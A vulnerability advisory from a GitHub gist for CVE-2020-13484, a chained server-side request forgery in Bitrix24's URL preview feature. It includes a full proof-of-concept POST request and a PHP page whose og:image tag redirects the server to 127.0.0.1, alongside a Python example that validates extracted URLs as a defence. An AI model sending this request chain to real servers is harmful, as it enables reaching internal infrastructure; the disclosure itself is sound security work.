@mariuszpoplwski
Last active October 9, 2023 19:09
CVE-2020-13484
https://gist.github.com/mariuszpoplawski/26e1fbde8f9a607478bee1de90daa329
------------------------------------------
Bitrix24 through 20.0.975 allows SSRF via an intranet IP address in
the services/main/ajax.php?action=attachUrlPreview url parameter, if
the destination URL hosts an HTML document
containing '<meta name="og:image" content="' followed by an intranet URL.
------------------------------------------
[Additional Information]
The vulnerability allowed us to trigger server-side request forgery to remote
addresses, and a second vulnerability in the same functionality allowed us to
bypass the restrictions and generate a further request that bypassed the policy
blocking local IPs. We were able to generate requests into the internal
infrastructure.
In the first stage we found an SSRF that only allowed us to send remote
requests. Then we manipulated the parser to parse our HTML page and
generate a second request to the internal Bitrix core from the server side. Bitrix
was parsing og:image tags, so this way we could trigger a second SSRF. The
second request was not properly checked for "local" IPs.
To generate the SSRF we need to trigger the following request:
POST /bitrix/services/main/ajax.php?action=attachUrlPreview&show_actions=y&buildd_preview=y&die_step=3&admin_section=Y&show_cache_stat1=Y&clear_cache=Y&c=bitrix:main.urlpreview&mode=ajax&=&sessid=bd277e27ef185f42bebbb1d538e66574&signedParamsString=1.12&listSubscribeId[]=1&itemId=1&deleteSubscribe=Y&userFieldId=0&elementId=1 HTTP/1.1
Host: 192.168.1.24
Origin: http://192.168.1.24
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36
Bx-ajax: true
Accept: */*
Referer: http://192.168.1.24/stream/
Accept-Encoding: gzip, deflate
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: BITRIX_SM_TIME_ZONE=-120; BITRIX_SM_SALE_UID=0; BITRIX_SM_SOUND_LOGIN_PLAYED=Y; PHPSESSID=btu7cck1irm51hsgs45akh5dma; BITRIX_SM_NCC=Y; BITRIX_SM_LOGIN=admin; BITRIX_SM_LAST_SETTINGS=;show_cache_stat=Y
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
url=http://OurVPSHost/index.php?id=1
The index.php file hosted on "OurVPSHost":
---------------------------------
<?php header('Content-Type:text/html'); ?>
<meta name="og:image" content="http://127.0.0.1/fake_img.php"/>
---------------------------------
The vulnerability sends a second SSRF: the first request does not allow sending
internal requests, but the HTML parser parses our og:image tag and sends an internal
request by redirecting the Bitrix server to 127.0.0.1/fake_img.php. This
way we are able to bypass the restrictions of the Bitrix core.
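The defensive counterpart of the issue above, as an added example that is not Bitrix's code: a URL-preview fetcher that applies the same address check to every URL it is about to request, including the og:image URL the HTML parser extracts, which is the hop the advisory found unchecked. The blocked ranges, the host names, the sample pages and the DNS table are all constructed for the example.

```python
import ipaddress
import re
from urllib.parse import urljoin, urlparse

# Ranges the preview fetcher must never contact (assumed policy, not Bitrix's own list).
BLOCKED_NETS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "::1/128", "fc00::/7", "fe80::/10")]
OG_IMAGE_RE = re.compile(
    r'<meta\s+(?:name|property)=["\']og:image["\']\s+content=["\']([^"\']+)["\']', re.I)
def address_is_blocked(ip):
    if ip.version == 6 and ip.ipv4_mapped is not None:  # ::ffff:127.0.0.1 -> 127.0.0.1
        ip = ip.ipv4_mapped
    return any(ip in net for net in BLOCKED_NETS)
def url_is_allowed(url, resolve):
    """http(s) only, and the host (IP literal or the resolve(host) answer) is not blocked."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False
    try:
        ip = ipaddress.ip_address(parsed.hostname)  # literal IP: no DNS lookup
    except ValueError:
        try:
            ip = ipaddress.ip_address(resolve(parsed.hostname))
        except (OSError, ValueError):  # NXDOMAIN or unusable answer: fail closed
            return False
    return not address_is_blocked(ip)
def build_preview(url, fetch, resolve):
    """(og_image_url, reason); the parser-extracted URL gets the same check as the user's URL."""
    if not url_is_allowed(url, resolve):
        return None, "page url blocked"
    match = OG_IMAGE_RE.search(fetch(url))
    if not match:
        return None, "no og:image"
    image_url = urljoin(url, match.group(1))  # og:image may be relative
    if not url_is_allowed(image_url, resolve):
        return None, "og:image url blocked"
    return image_url, "ok"

# Constructed stand-ins for the network: the advisory's attacker page plus a benign one.
SAMPLE_PAGES = {
    "http://ourvpshost.example/index.php?id=1":
        '<meta name="og:image" content="http://127.0.0.1/fake_img.php"/>',
    "http://ourvpshost.example/ok.html": '<meta property="og:image" content="/img/og.png"/>',
}
CONSTRUCTED_DNS = {"ourvpshost.example": "203.0.113.10"}  # constructed, not a real host
def constructed_fetch(url):
    return SAMPLE_PAGES.get(url, "")
def constructed_resolve(host):
    return CONSTRUCTED_DNS.get(host)  # None for unknown hosts -> url_is_allowed fails closed
```

In a real fetcher, connect to the address that passed the check rather than resolving the name a second time, so a DNS answer that changes between check and connect cannot undo the check.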
------------------------------------------
[VulnerabilityType Other]
Unauthenticated server-side request forgery, domain whitelist bypass
------------------------------------------
[Vendor of Product]
1c-bitrix.ru, bitrix24.net
------------------------------------------
[Affected Product Code Base]
Bitrix and Bitrix Cloud instances affected up to security update main 20.0.975; reported and fixed in the latest patch
------------------------------------------
[Affected Component]
Main core URLPreview function
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[CVE Impact Other]
Forced server-side request forgery
------------------------------------------
[Attack Vectors]
To exploit the vulnerability an attacker needs access to the website, a valid
unauthenticated session and a CSRF token; all of these can be generated without any
privileges, and no additional requirements are needed.
------------------------------------------
[Has vendor confirmed or acknowledged the vulnerability?]
true
------------------------------------------
[Discoverer]
Mariusz Poplawski (afine.pl)
------------------------------------------
[Reference]
https://www.bitrix24.com/prices/self-hosted.php
https://www.bitrix24.com/security/
Mariusz Popłwski / AFINE.com team